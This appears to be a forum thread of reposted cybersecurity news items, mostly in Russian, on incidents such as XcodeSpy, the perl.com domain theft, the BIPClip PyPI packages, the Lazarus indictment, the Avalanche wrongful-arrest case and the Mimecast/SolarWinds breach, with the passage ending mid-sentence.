Эксперты «Лаборатории Касперского» подсчитали, что две трети российских IT- компаний запрещают своим аналитикам делиться данными о киберугрозах с профессиональным сообществом.
В прошлом году компания провела опрос, в котором приняли участие 5 266 IT- специалистов из 31 страны, включая Россию. Как оказалось, в России 68% аналитиков киберугроз состоят в профессиональных сообществах. Но, по словам 69% таких сотрудников из сферы IT и кибербезопасности, делиться результатами своих исследований с коллегами по индустрии им не разрешается правилами компании.
Чаще всего аналитики общаются на специализированных форумах и блогах (55%), теневых форумах (26%) и в группах в соцсетях (14%). Но только каждый пятый специалист (19%) делится своими находками. Если правила компании допускают обмен такой информацией с сообществом, то это делает почти каждый второй (49%), если же нет, то около 5% нарушают запрет.
По мнению экспертов «Лаборатории Касперского», ограничения на обмен информацией могут быть вызваны опасениями преждевременно раскрыть важные данные и тем самым позволить злоумышленникам сменить тактику и успешно продолжить атаку.
«Когда речь идет о защите от продвинутых киберугроз, ценна любая информация — как о новом вредоносном ПО, так и о техниках злоумышленников. Вот почему мы делимся тем, что обнаруживаем, в том числе в сервисах по анализу киберугроз. Мы убеждены, что аналитики должны помогать сообществу и сотрудничать друг с другом», — комментирует Мария Наместникова, руководитель российского исследовательского центра «Лаборатории Касперского».
Click to expand...
Источник: xakep.ru/2021/03/25/threat-intel-silence/
Специалисты ИБ-компании SentinelOne рассказали о новом типе вредоносного ПО для macOS, которое используется в атаках на разработчиков iOS через троянизированные проекты Xcode.
Вредоносное ПО XcodeSpy состоит из Run Script, добавленного в легитимный Xcode-проект под названием TabBarInteraction. Этот вредоносный скрипт запускается при каждой разработке Xcode-проекта, устанавливает LaunchAgent для сохранения персистентности после перезагрузки системы, а затем загружает вторичную полезную нагрузку - macOS-бэкдор EggShell.
По словам экспертов, проанализировавших бэкдор, он обладает функциями записи аудио через микрофон устройства жертвы, а также записи видео и набранного текста на клавиатуре. Кроме того, EggShell позволяет загружать и выгружать файлы.
Хотя управляющая LaunchAgent инфраструктура серверов XcodeSpy была отключена, исследователю безопасности SentinelOne Филу Стоуксу (Phil Stokes) удалось найти несколько установок бэкдора EggShell, загруженных на VirusTotal.
Стоукс впервые узнал о бэкдоре от анонимного исследователя, обнаружившего его в сетях некой американской компании. Как сообщили представители компании, она регулярно подвергается кибератакам со стороны северокорейских APT-групп, и EggShell был обнаружен в процессе регулярных сканирований сети на признаки присутсвия в ней северокорейских хакеров. Однако, как отметил Стоукс, на 100% связать EggShell с северокорейскими APT-группами экспертам не удалось.
Основываясь на собранных в ходе расследования сведениях, специалисты считают, что злоумышленники были активны в период с июля по октябрь 2020 года и в первую очередь атаковали разработчиков из Азии.
• Source: [https://labs.sentinelone.com/new-ma...gets-xcode-developers-with- eggshell-backdoor/](https://labs.sentinelone.com/new-macos-malware-xcodespy- targets-xcode-developers-with-eggshell-backdoor/)
В начале февраля стало известно о захвате домена perl[.]com, принадлежащего Perl Foundation и Тому Кристиансену (Tom Christiansen), который использует его с 1997 года для размещения новостей и статей о языке Perl.
Тогда адвокат Джон Беррихилл, специализирующийся на вопросах интеллектуальной собственности, сообщал, что домен украли еще в сентябре 2020 года, когда тот был связан с регистратором Network Solutions. Так как после обновления контактной информации ICANN запрещает перенос домена в течение 60 дней, домен передали регистратору BizCN в Китае лишь во время рождественских праздников. Затем 27 января 2021 года он перешел к регистратору Key-Systems. После этого IP-адрес, назначенный домену, был изменен с 151.101.2.132 на IP-адрес Google Cloud — 35.186.238 [.]101.
Как теперь пишет редактор пострадавшего ресурса Брайан Ди Фой, домен был скомпрометирован при помощи социальной инженерии. Специалист пообщался с другими людьми, пострадавшими от аналогичных атак, хотя представители Network Solutions по-прежнему не подтвердили эту версию официально.
«Мы считаем, что на Network Solutions была совершена атака с использованием социальной инженерии (включавшая фальшивые документы и так далее). У Network Solutions нет причин сообщать мне что-либо, но я разговаривал с другими пострадавшими владельцами доменов, и они описали точно такую же схему [атак]», — рассказывает Ди Фой.
Click to expand...
После перехода домена к регистратору Key-Systems, неизвестные попытались продать perl[.]com за 190 000 долларов на торговой площадке Afternic, принадлежащей GoDaddy. Впрочем лот быстро сняли с продажи, когда вмешались эксперты.
Аналитики Perl Network Operations Center детально описали в своем блоге всю хронологию событий. В конечном итоге домен все же вернулся к своему законному владельцу Тому Кристиансену в начале февраля 2021 года. Правда на возвращение к нормальной работе потребовалось больше времени, так как многие защитные решения уже занесли домен в черные списки, а также возникли проблемы с DNS- серверами, которые применяли к домену sinkholing. В настоящее время, по данным Ди Фоя, всё наконец заработало в штатном режиме.
Источник: xakep.ru/2021/03/03/perlcom-lives/
Security researchers have spotted a new malware operation targeting Mac
devices that has silently infected almost 30,000 systems.
Named Silver Sparrow , the malware was discovered by security researchers
from Red Canary and analyzed together with researchers from Malwarebytes and
VMWare Carbon Black.
"According to data provided by Malwarebytes, Silver Sparrow had infected 29,139 macOS endpoints across 153 countries as of February 17, including high volumes of detection in the United States, the United Kingdom, Canada, France, and Germany," Red Canary's Tony Lambert wrote in a report published last week.
But despite the high number of infections, details about how the malware was distributed and infected users are still scarce, and it's unclear if Silver Sparrow was hidden inside malicious ads, pirated apps, or fake Flash updaters —the classic distribution vector for most Mac malware strains these days.
Furthermore, the purpose of this malware is also unclear, and researchers don't know what its final goal is.
Once Silver Sparrow infects a system, the malware just waits for new commands from its operators -- commands that never arrived during the time researchers analyzed it, hoping to learn more of its inner workings prior to releasing their report.
But this shouldn't be interpreted as a failed malware strain, Red Canary
warns. It may be possible that the malware is capable of detecting researchers
analyzing its behavior and is simply avoiding delivering its second-stage
payloads to these systems.
The large number of infected systems clearly suggests this is a very serious
threat and not just some threat actor's one-off tests.
In addition, the malware also comes with support for infecting macOS systems running on Apple's latest M1 chip architecture, once again confirming this is a novel and well-maintained threat.
In fact, Silver Sparrow is the second malware strain discovered that can run on M1 architectures after the first was discovered just four days before, showing exactly how cutting-edge this new threat really is.
"Though we haven't observed Silver Sparrow delivering additional malicious payloads yet, its forward-looking M1 chip compatibility, global reach, relatively high infection rate, and operational maturity suggest Silver Sparrow is a reasonably serious threat, uniquely positioned to deliver a potentially impactful payload at a moment's notice," Lambert warned in his report.
"Given these causes for concern, in the spirit of transparency, we wanted to share everything we know with the broader infosec industry sooner rather than later."
The Red Canary report contains indicators of compromise, such as files and file paths created and used by the malware, which can be used to detect infected systems.
The U.S. Department of Justice has charged three North Koreans for stealing $1.3 billion in money and cryptocurrency in attacks on banks, the entertainment industry, cryptocurrency companies, and more.
The defendants are state-sponsored North Korean hackers and members of Reconnaissance General Bureau (RGB) units, a North Korean military intelligence agency that has engaged in criminal hacking operations.
"These North Korean military hacking units are known by multiple names in the
cybersecurity community, including Lazarus Group and Advanced Persistent
Threat 38 (APT38)," the DOJ
said.
According to DOJ, the three North Koreans have been "participating in a wide-
ranging criminal conspiracy to conduct a series of destructive cyberattacks,
to steal and extort more than $1.3 billion of money and cryptocurrency from
financial institutions and companies, to create and deploy multiple malicious
cryptocurrency applications, and to develop and fraudulently market a
blockchain platform."
The US
[indicted](https://beta.documentcloud.org/documents/20485414-dprk_hacking_-
_indictment_0_0) Jon Chang Hyok (전창혁), Kim Il (김일), and Park Jin Hyok (박진혁),
with Park previously indicted in September 2018 for being a part of a "wide-
ranging, multi-year conspiracy to conduct computer intrusions and commit wire
fraud by co-conspirators working on behalf of the government of the Democratic
People’s Republic of Korea."
The Lazarus Group (tracked by the US as HIDDEN COBRA) is known for targeting high-profile orgs such as Sony Pictures Entertainment and multiple banks worldwide.
Their hacking campaign allowed them to steal hundreds of millions of US dollars, for instance, getting away with roughly $140 million by breaching Bangladesh Bank [[1](https://foreignpolicy.com/2017/03/21/nsa-official- suggests-north-korea-was-culprit-in-bangladesh-bank-heist/), [2](https://www.reuters.com/article/us-cyber-heist-bangladesh-northkorea- idUSKBN16T2Z3)], Banco de Chile, and the Far Eastern International Bank of Taiwan.
The North Korean-backed hackers were indicted for multiple hacking activities, including:
The indictment alleges that the hacking group's goal was to "further the strategic and financial interests of the DPRK government and its leader, Kim Jong Un" by causing damage, as well as stealing data and money from organizations all over the globe.
"The Department’s criminal charges are uniquely credible forms of attribution — we can prove these allegations beyond a reasonable doubt using only unclassified, admissible evidence," Assistant Attorney General John C. Demers said. "And they are the only way in which the Department speaks."
The United Nations [estimated in 2019](https://www.reuters.com/article/us- northkorea-cyber-un/north-korea-took-2-billion-in-cyberattacks-to-fund- weapons-program-u-n-report-idUSKCN1UV1ZX) that North Korea has generated as much as $2 billion from at least 35 cyberattacks targeting banks and cryptocurrency exchanges across over a dozen countries.
Another United Nations report from 2019 said that DPRK-backed hackers hitting Asian cryptocurrency exchanges between January 2017 and September 2018 were believed to be behind $571 million in financial losses.
"This revenue allows the North Korean regime to continue to invest in its illicit ballistic missile and nuclear programs," the Justice Department said.
Also in 2019, the U.S. Treasury also sanctioned three North Korean hacking groups (Lazarus Group, Bluenoroff, and Andariel) engaged in funneling stolen financial assets to the North Korean government.
"North Korea’s operatives, using keyboards rather than guns, stealing digital wallets of cryptocurrency instead of sacks of cash, are the world’s leading bank robbers," Demers added.
"The Department will continue to confront malicious nation state cyber activity with our unique tools and work with our fellow agencies and the family of norms abiding nations to do the same."
Платформа PyPI в очередной раз стала удобным каналом распространения вредоносного кода.
В репозитории Python Package Index (PyPI) недавно были обнаружены семь пакетов, предназначенных для кражи мнемонических фраз BIP39, используемых для восстановления приватных ключей криптовалютных кошельков.
Операция, получившая название BIPClip и выявленная специалистами из компании ReversingLabs, нацелена на разработчиков, работающих над проектами по созданию и защите криптовалютных кошельков.
Эти пакеты, загруженные суммарно 7451 раз до их удаления с PyPI, представляют собой следующий список:
Примечательно, что вредоносная кампания BIPClip была начата довольно давно — 4 декабря 2022 года. Именно тогда был впервые опубликован предпоследний пакет из списка выше — «hashdecrypt».
Один из пакетов — «mnemonic_to_address» — не содержал вредоносного кода, за исключением указания «bip39-mnemonic-decrypt» в качестве зависимости, где и был скрыт вредоносный компонент. Два других пакета — «public-address- generator» и «erc20-scanner» — работали аналогичным образом, пересылая мнемонические фразы на сервер управления злоумышленников. В свою очередь, «hashdecrypts» содержал практически идентичный код для извлечения данных.
Кроме того, в составе этих пакетов были обнаружены ссылки на профиль GitHub под названием «HashSnake», в котором рекламируется репозиторий hCrypto для извлечения мнемонических фраз из криптовалютных кошельков с использованием пакета «hashdecrypts». История коммитов репозитория показывает, что кампания длится уже более года.
Аккаунт HashSnake также присутствует в Telegram и YouTube, где рекламируются соответствующие программные продукты. Например, 7 сентября 2022 года было опубликовано видео с инструментом для проверки криптовалютных журналов xMultiChecker 2.0.
Обнаружение этих пакетов подчёркивает угрозы безопасности, связанные с репозиториями открытого кода, особенно когда для распространения вредоносного ПО используются законные сервисы, такие как GitHub.
Кроме того, проекты, которые больше не обновляются, становятся привлекательными целями для злоумышленников, которые могут захватить контроль над аккаунтами разработчиков и публиковать троянизированные версии продуктов, открывая путь для масштабных атак на цепочку поставок.
Причём хакеры способны не просто единоразово скомпрометировать цепочку поставок, но и оставаться незамеченными на протяжении долгого времени, что дополнительно увеличивает риски как для разработчиков, так и для простых пользователей.

passwords ](https://www.reversinglabs.com/blog/bipclip-malicious-pypi- packages-target-crypto-wallet-recovery-passwords)
RL has discovered a campaign using malicious PyPI packages posing as open- source libraries to steal BIP39 mnemonic phrases used for crypto wallet recovery.
www.reversinglabs.com
Инженер из Москвы запланировал провести вечер с женщиной с низкой социальной ответственностью, но стал жертвой мошенников, отдав им почти 600 тысяч рублей. Об этом в пятницу, 26 мая.
Согласно данным, 48-летний москвич сети Интернет наткнулся на объявление, в котором предлагалось обратиться к жрицам любви, и решил позвонить по предлагаемому номеру. Ответивший ему человек попросил перевести на карту 2500 рублей предоплаты, а после ещё 7200 рублей в качестве страховки.
Уточняется, что проститутка по вызову к инженеру так и не приехала, но количество звонков от мошенников увеличились. Они беспокоили, трезвонили ему два дня с требования выплаты денежной компенсации за то, что он якобы обрушил работу их приложения. Испугавшийся мужчина отдал мошенникам более 575 тысяч рублей. Позже он обратился с заявлением в правоохранительные органы, которые проводит проверку по факту мошенничества.
Дешифратор был разработан в сотрудничестве с Европолом, NoMoreRansom и правоохранительными органами Цюриха.
Инструмент для дешифровки и инструкцию к нему уже можно загрузить в серверов Bitdefender. Компания утверждает, что дешифратор был разработан в сотрудничестве с правоохранительными органами Цюриха, Европолом и проектом NoMoreRansom.
Чтобы создать рабочий дешифратор, исследователям обычно нужно найти недостаток в криптографии, используемой вымогательским ПО. Однако, в этом случае процесс создания инструмента сильно ускорил арест операторов LockerGoga, так как правоохранительные органы смогли получить доступ к главным ключам, которые используются для расшифровки файлов жертв.
Как работает утилита? Все просто – дешифровщик сканирует всю файловую систему или выбранную пользователем папку, находит файлы с расширением “.locked” и автоматически выполняет расшифровку. Для того, чтобы программа сработала, компьютер должен быть подключен к интернету, а все записки о выкупе должны находиться там, где появились изначально.
Bitdefender утверждает, что дешифратор может работать как на одной одном устройстве, так и на целых сетях, зашифрованных LockerGoga. Однако компания обращает внимание на то, что процесс расшифровки может быть прерван или не всегда работать так, как должен, поэтому пользователям рекомендуется не выключать функцию резервного копирования, встроенную в дешифровщик.
source:
download.bitdefender.com/am/malware_removal/BDLockerGogaDecryptTool.exe
nomoreransom.org/uploads/LockerGoga-Decrypt-Doc.pdf
В странах с более жесткими законами о клевете, чем в США, Twitter могут ожидать судебные тяжбы, если компания решит устанавливать личность своих пользователей.
"Свобода слова - это основа функционирующей демократии, а Twitter - это цифровая городская площадь, где обсуждаются вопросы, жизненно важные для будущего человечества", - сказал Илон Маск в официальном заявлении о сделке по покупке Twitter. Миллиардер добавил, что хочет сделать площадку лучше чем когда-либо, улучшая продукт новыми функциями и добавляя алгоритмы с открытым исходным кодом для повышения доверия к площадке. Помимо этого, в его планах была победа над спам-ботами и аутентификация всех пользователей. Правда, позже Маск отказался от своих прежних обещаний насчет свободы слова, заявив, что она распространяется только в рамках закона.
"У него примитивное либертарианское представление о свободе слова, сводящееся к тому, что право пользоваться микрофоном принадлежит человеку с самым громким голосом и самой большой дубиной, для того чтобы бить других.",– сказал Брюс Шапиро в эфире радио ABC на прошлой неделе. "Это не совсем модель свободы слова. Это модель запугивания, превращающая платформы в средства для разжигания культурных войн и подавления зачастую более разумных голосов".
Исполнительный директор Digital Rights Watch Джеймс Кларк сказал, что анонимность жизненно важна для противостояния власть имущим.
"В эпоху, когда наш цифровой след становится более ярким и отслеживаемым, чем когда-либо прежде, сохранение анонимности - это способ сохранить частную жизнь наряду с публичной в Интернете", - заявил он. "Еще мне хотелось бы добавить, учитывая историю запугивания Маском критиков и разоблачителей, что многие не захотят загружать документы, удостоверяющие личность, на контролируемую им платформу".
В тех странах, где действия Илона Маска приводят к законам, ущемляющим свободу слова, инициативы миллиардера скорее всего будут рассматриваться не более чем сопутствующий ущерб, даже если они утонут в судебных издержках.
source: twitter.com/elonmusk/status/1519036983137509376 | abc.net.au/radionational/programs/latenightlive/bruce-shapiros-america/13855640
В 2016 году состоялась масштабная операция по ликвидации киберсети Avalanche. Среди задержанных оказался и киевский программист Антон Тимохин. Почти три месяца он пробыл в СИЗО и еще шесть под домашним арестом. Единственным основанием для его задержания было то, что его ник в соцсетях - Grower - совпадал с ником одного из киберпреступников.
Это дело было закрыто только в 2019 году: ожидаемо, что из-за нехватки доказательств. Тимохин обратился в суд за возмещением. Недавно стало известно, что вместо ожидаемого миллиона гривен получит лишь 700 тысяч. А впоследствии суд уменьшил сумму до 200 тысяч, решив, что она «необоснованно завышена».
Журналистка DOU исследовала историю Тимохина и разоблачение киберсети Avalanche.
С чего все началось, или Кто такие Avalanche
В декабре 2016 года тогдашние Генеральный прокурор Украины Юрий Луценко и в.и.о. главы Нацполиции Вадим Троян на совместном брифинге заявили о ликвидации киберсети Avalanche, которая функционировала семь лет и занималась так называемым интернет-фишингом. Преступники распространяли вредоносные коды через электронную почту, чтобы нелегально выводить средства с банковских счетов пользователей.
Немецкие правоохранители в кооперации с властями США, ФБР, Европолом в течение четырех лет исследовали [деятельность](https://www.interpol.int/News-and- Events/News/2016/Avalanche-network-dismantled-in-international-cyber- operation) этой сети, которая начала свою «работу» с 2009 года.
Жертвами киберпреступников стали пользователи из более чем 180 стран мира, а убытки оценивались в сотни миллионов евро. При этом по меньшей мере 500 тысяч компьютеров по всему миру были поражены вредоносными вирусами и контролировались сетью Avalanche.
Киберпреступники отмывали средства, украденные с помощью атак злонамеренного программного обеспечения, через покупку товаров.
В Интерполе сообщили, что за день скоординированной совместной спецоперации, которая состоялась 30 ноября 2016 года, было заблокировано более 800 тысяч доменов, проведено 37 обысков, изъято 39 серверов, еще 221 сервер отключен из- за сообщения провайдерам хостинга. А еще тогда были арестованы пять человек. Трое из них граждане Украины.
Как заявил Юрий Луценко, по версии следствия, организатор сети Avalanche - гражданин Украины, который во время задержания в Полтаве оказал вооруженное сопротивление, имея на руках автомат Калашникова и пистолет.
Вадим Троян сообщил, что в целом киберпреступная группа насчитывает 27 членов из разных стран, из них десять - граждане Украины. В отношении главного организатора Avalanche Вадим Троян заявил, что его будут судить либо в нашей стране, либо передадут в Германию.
А при чем здесь Антон Тимохин?
Подозрение за никнейм
12 января 2017 года на портале DOU Software Engineer Иван Пучко написал о том, что в рамках громкой спецоперации по раскрытию киберпреступников украинские правоохранители, в частности, задержали киевского .NET-разработчика, его бывшего коллегу Антона Тимохина. Основанием для задержания стало использование Тимохиным в сети никнейма Grower, который также использовал киберпреступник, причастный к Avalanche.
Как отмечает Иван Пучко, «специалисты киберполиции просто загуглили никнейм, один из результатов совпал с киевским программистом».
Иван Пучко также подчеркивает, что если загуглить «grower nickname», то сеть выдает более 500 тысяч результатов:
«Получается, что человека сейчас судят только за то, что у него никнейм Grower, и надо же наказать кого-то, ведь пострадает имидж страны».
Антону Тимохину вручили подозрение фактически за связь с сетью Avalanche 5 января 2017 года. А уже на следующий день ему определили меру пресечения в виде содержания под стражей с возможностью внесения залога в размере 1000 минимальных заработных плат, то есть на то время 3,2 миллиона гривен.
3 марта 2017 года на основании постановления заместителя Генерального прокурора Украины досудебное расследование по этому делу продлено до шести месяцев, а постановлением следственного судьи от 4 марта Антону Тимохину продлили срок содержания под стражей до 2 мая. Все это время киевский разработчик сидел в СИЗО.
25 апреля 2017 года следственный судья отправил Тимохина под домашний арест, который продлевался до 17 октября 2017 года.
А 12 октября досудебное расследование, где фигурировал именно Антон Тимохин, было остановлено. Дело закрыли за недостаточностью доказательств в апреле 2019-го.
В августе 2020 года разработчик обратился в суд с требованием компенсации одного миллиона гривен морального вреда.
В частности, в рамках судебного процесса Тимохин заявил, что получил подозрение в совершении уголовного правонарушения из-за того, что имел никнейм Grower в одной из социальных сетей. Этот никнейм тождественен никнейму лица, которое является участником международной группы хакеров, совершавшей преступления с использованием сети интернет. Каких-либо других доказательств его причастности к выявленным преступлениям представлено не было.
Из-за таких действий правоохранителей Тимохин находился в изоляции всего 109 дней, 183 дня он был под домашним арестом и 28 месяцев находился в статусе подозреваемого.
Кроме этого, в рамках уголовного производства на имущество Тимохина наложили арест. В частности, автомобиль разработчик смог вернуть только 3 февраля 2018 года.
19 января 2021 года Печерский районный суд Киева частично удовлетворил требования Тимохина о возмещении, присудив денежную компенсацию морального вреда в размере 700 тысяч гривен и 13 тысяч гривен расходов на профессиональную правовую помощь.
Офис Генерального прокурора не согласился с этим решением и подал апелляционную жалобу.
В частности, позиция прокуратуры заключается в том, что вред Тимохину нанесен не по вине украинских правоохранительных органов. Запрос на его задержание поступил от немецких правоохранителей:
«От компетентных органов Федеративной Республики Германия поступил запрос о предоставлении международной правовой помощи по уголовному делу в виде проведения обысков и задержания двух граждан Украины, в частности Антона Тимохина, в связи с подозрением в участии в международной преступной организации».
Немецкая сторона доказательства в подтверждение обвинения так и не предоставила. Но в адрес Генеральной прокуратуры поступило сообщение о праве Антона Тимохина на возмещение именно немецкой стороной, которое он якобы получил в 2019 году.
Как оказалось, это возмещение за проведение обыска 30 ноября 2016 года.
В результате Киевский апелляционный суд определил размер возмещения морального вреда в размере 200 тысяч гривен и 5 тысяч гривен взысканий на юридическую помощь. Эти деньги Антон Тимохин должен получить за счет бюджетных средств.
Компенсация уменьшена до минимума
В то же время адвокат Антона Тимохина, партнер АО «Модус Зильвер» Евгений Заруднев решением апелляционного суда недоволен:
"Апелляционный суд полностью согласился с позицией и аргументацией адвокатов Антона Тимохина и опроверг доводы ответчиков. Впрочем уменьшение размера компенсации морального вреда апелляционный суд объяснил одним подпункт, в котором не содержится ни одного аргумента или ссылки на положения законодательства. Апелляционный суд только отметил, что сумма в 700 000 гривен является «необоснованно завышенной».
По словам Заруднева, сейчас готовится кассационная жалоба:
"В случае неоткрытия кассационного производства или других неудовлетворительных результатов планируется обращение в ЕСПЧ (Европейский суд по правам человека). Общее намерение господина Антона Тимохина - восстановить справедливость и добиться надлежащей защиты своих прав ".
Также Евгений Заруднев отметил, что длительное время адвокаты добивались открытия уголовного производства за незаконное лишение свободы и ряд других преступлений, совершенных в отношении Антона Тимохина во время досудебного расследования:
"Дошло даже до обращения в суд с заявлением о вынуждении внести данные об уголовном правонарушении в ЕРДР (Единый реестр досудебных расследований), без такого судебного решения следователи отказывались это делать. Впоследствии понадобились многочисленные жалобы, обращения в суд для того, чтобы Тимохина признали потерпевшим по делу "
Адвокат подчеркивает, что пока неизвестно, понесет ли кто-то уголовную ответственность за все, что досталось Антону Тимохину во время пребывания под следствием и сам факт этого.
Мы поговорили и непосредственно с Антоном Тимохиным. По его словам, он удивлен решением суда по уменьшению компенсации до 200 тысяч:
"Как они так посчитали эту сумму? Они решили предоставить практически минимальный размер компенсации (минимальный размер компенсации, установленный законом, составляет 140 тысяч гривен) ".
Что касается компенсации со стороны немецкой стороны, то Антон Тимохин объясняет: ему дали лишь документ, за которым он может обращаться за компенсацией, но денег он не получал.
"Когда был брифинг Луценко и Троян, они так хвастались этой спецоперацией и работой киберполиции, но" сели в лужу ". И вместо того, чтобы быстро признать свою ошибку, они ждали документов от немецкой стороны, сами ничего не делали. А я в это время находился в СИЗО. Киберполиция выглядела в этой ситуации крайне непрофессионально: они просто зашли "Вконтакте", нашли мой профиль и выдали ордер на мой арест ", - подчеркнул Антон Тимохин.
А что же было с делом по сети Avalanche?
Какова судьба предполагаемого основателя Avalanche
В 2016 году в ходе спецоперации был задержан предполагаемый основатель хакерской сети Геннадий Капканов. Его после громкого задержания отпустил Октябрский районный суд Полтавской области. И он на какое-то время сбежал от органов следствия.
В частности, в судебном реестре можно найти определение апелляционного суда Полтавской области за 2016 год. Тогда рассматривалась жалоба прокурора Генеральной прокуратуры. Речь шла об обжаловании определения суда первой инстанции, который отказал во временном аресте Капканова. По версии следствия, именно Капканов был одним из двух администраторов нелегальной сети и отвечал за работу структуры ботов под названием Avalanche. Однако суд первой инстанции на это не принял к сведению и в аресте отказал. В суде отметили, что целью применения временного ареста является дальнейшая выдача правонарушителя, а Украина не будет выдавать другому государству своих граждан. Также отсутствует документ об избрании для Капканова меры пресечения компетентным органом иностранного государства, по требованию которого он и был задержан.
И хотя в апелляции Капканову таки назначили временный арест, он к тому времени скрылся от органов следствия почти на полтора года. Как сообщает интернет-издание «Полтавщина», Геннадия Капканова повторно смогли задержать только 25 февраля 2018 года в Киеве. Тогда ему вручили подозрение только в посягательстве на жизнь работника правоохранительного органа (ст. 348 УК Украины), почему-то миновав историю с Avalanche. Речь шла именно о задержании 2016 года, во время которого Капканов отстреливался от правоохранителей. На избрании меры пресечения Капканов заявил, что выстрелил случайно, потому что считал, что в его дом прибегают преступники. Полтора года он вроде бы путешествовал по стране и не знал, что находится в розыске.
В конце концов, в 2019 году Октябрьский районный суд вынес решение в отношении Капканова, которого обвиняли по трем статьям, а именно «посягательство на жизнь работника правоохранительного органа», «незаконное обращение с оружием» (263 УК Украины), и «использование заведомо поддельного документа» (358 УК Украины) - во время задержания у Капканова изъяли поддельного документа.
Суд признал его виновным только по статье 358 Уголовного кодекса Украины, назначив наказание в виде двух лет лишения свободы, которое к тому времени Капканов уже отбыл (с 2018 года). При этом по статьям 348 и 263 УКУ он был оправдан, поскольку не доказано, что в его действиях есть признаки уголовных правонарушений.
А что касается международной киберпреступности, то, очевидно, досудебное расследование продолжается до сих пор. Дело [открыли](https://reyestr.court.gov.ua/Review/67433598?fbclid=IwAR2ZOOFdgOI_LFfKHH2Wkpfmd2L6BcBeFBOqJ3ReVwOI- vzKXe4M_b_sRZ0) еще в апреле 2017 года. Среди статей указаны «незаконное вмешательство в работу компьютеров» (361 УК Украины), «мошенничество» (190 УК Украины) и др. Известно, что Капканову вручили подозрение в этом расследовании, но в судебное разбирательство дело до сих пор не вылилось. Германии его тоже не передали.
Не удалось найти информацию о других членах сети Avalanche.
Таким образом, громкие заявления и масштабная спецоперация украинских правоохранителей по разоблачению киберпреступников Avalanche с 2016 года до сегодняшнего дня не вылилась в судебное разбирательство. Работа киберполиции по доказательству причастности к киберпреступлениям Антона Тимохина свелась к поиску подходящего никнейма в интернете. Де-факто киевский программист отсидел несколько месяцев ни за что. При этом компенсацию за непрофессиональные действия правоохранителей ему заплатят украинские налогоплательщики.
• Source: https://dou.ua/lenta/articles/grower-story/?from=tge
Эксперты обнаружили, что количество объявлений о поиске работы в даркнете и на хакерских форумах растет. Причем с начала 2021 года наметился новый тренд: не хакеры размещают там свои «вакансии», а соискатели сами публикуют объявления и сообщают, что готовы работать на преступников.
По наблюдениям исследователей, за последний квартал на форумах ежемесячно появлялось от 10 до 16 новых сообщений такого рода. Учитывая, что раньше такие объявления были большой редкостью, это внушительное число. Исследователи связывают происходящее с отчаянием людей, которые не могут найти работу и испытывают финансовые сложности из-за пандемии коронавируса, которая повлияла на мировую экономику и привела к росту безработицы по всему миру.
В объявлениях отчаявшиеся соискатели предлагают свою помощь киберпреступникам, «обещая не задавать глупых вопросов», «доступность 24/7» и «желание зарабатывать деньги в любыми способами».
«До этого года мы крайне редко видели сообщения от людей, которые готовы на нелегальную работу и, более того, сами ищут ее в даркнете. Мы были встревожены и поражены. Люди, сами предлагающие свои услуги киберпреступникам, подвергают большой опасности всех нас. Поэтому мы выбрали несколько хакерских форумов и мониторили их последние несколько месяцев. Мы отметили, что количество сообщений от соискателей на этих форумах постоянно росло. Мы подозреваем, что на других хакерских форумах в даркнете та же ситуация. На наш взгляд, даркнет должен быть последним местом, где люди могут искать работу. Эта тенденция показывает тяжелую финансовую ситуацию, в которой многие оказались после пандемии. Такой “крик о помощи” должен стать сигналом для всех, кто хочет минимизировать незаконную преступную деятельность», — рассказывает Одед Вануну, глава Check Point Software Technologies по исследованию уязвимостей продуктов.
Click to expand...
В своем отчете эксперты Check Point приводят примеры таких объявлений по поиску работы. Ниже приводим некоторые из них.
Соискатель из России говорит, что находится в тяжелом финансовом положении и предлагает свои услуги в сфере «обналичивания денег, DDOS, безопасности» и обещает не задавать слишком много глупых вопросов
Соискатель пишет: «Готов на любую возможную работу… Я дома 24 часа в сутки, 7 дней в неделю из-за этой пандемии»
Соискатель готов быть отправителем, обналичивать деньги, быть курьером
25-летняя женщина из Украины, «имеет опыт мошенничества в сфере логистики,
продаж и оптовой торговли», понимает риски, связанные с выполнением такой
работы, ищет должность с ежемесячной оплатой
Источник: xakep.ru/2021/03/23/criminal-job/
Еще в середине января 2021 года представители компании Mimecast предупреждали о том, что в распоряжении неизвестного хакера оказался один из ее цифровых сертификатов. Тогда злоумышленник злоупотребил им, чтобы получить доступ к некоторым учетным записям Microsoft 365 клиентов.
Скомпрометированный сертификат использовался несколькими продуктами компании (Mimecast Sync and Recover, Continuity Monitor и IEP) для подключения к инфраструктуре Microsoft. При этом сообщалось, что лишь 10% клиентов использовали вышеперечисленные продукты с этим сертификатом, а злоумышленник злоупотребил сертификатом, чтобы получить доступ всего к нескольким аккаунтам Microsoft 365. В компании утверждали, что число пострадавших клиентов низкое и «однозначное», и всех их уже уведомили об инциденте.
Позже выяснилось, что компрометация сертификата была напрямую связана с взломом компании SolarWinds, так как Mimecast использовала зараженную версию платформы Orion. Соответственно, сертификатом злоупотребляли те же хакеры, что взломали SolarWinds.
Как стало известно теперь, хакеры все же получили доступ и к другим частям внутренней сети Mimecast.
«Все скомпрометированные системы работали под управлением Windows и являлись периферийными по отношению к ядру нашей производственной клиентской инфраструктуры», — пишут в компании.
Click to expand...
В Mimecast заявляют, что в итоге все скомпрометированные серверы были заменены «для устранения угрозы», а расследование не выявило доказательств того, что атакующие получили доступ к электронной почте или архивному контенту, который компания хранила на этих серверах для своих клиентов.
Однако злоумышленникам все же удалось добраться до репозитория, где размещался код Mimecast, откуда, как стало ясно теперь, были похищены некоторые исходники. В заявлении компании подчеркивается, что злоумышленники похитили только небольшие части кода, но не все проекты целиком.
«Мы полагаем, что исходный код, загруженный злоумышленником, был неполным и недостаточным для создания и запуска любого аспекта службы Mimecast. Мы не обнаружили доказательств того, что атакующий внес какие-либо изменения в наш исходный код, и не считаем, что это может оказать какое-то влияние на наши продукты», — говорят в компании.
Click to expand...
Напомню, что ранее то же самое произошло и с компанией Microsoft. После компрометации SolarWinds у ИТ-гиганта были похищены исходные коды компонентов Azure, Intune и Exchange. Представители Microsoft так же заверили, что утечка никак не скажется на продуктах компании, а инцидент в целом не позволил хакерам получить широкий доступ к пользовательским данным.
Взлом SolarWinds стал одной из наиболее масштабных атак на цепочку поставок в
историю.
Атаку на SolarWinds приписывают предположительно русскоязычной хак-группе,
которую ИБ-эксперты отслеживают под названиями StellarParticle (CrowdStrike),
UNC2452 (FireEye) и Dark Halo (Volexity).
В декабре 2020 года стало известно, что неизвестные злоумышленники атаковали
компанию SolarWinds и заразили ее платформу Orion малварью. Согласно
официальным данным, среди 300 000 клиентов SolarWinds только 33 000
использовали Orion, а зараженная версия платформы была установлена примерно у
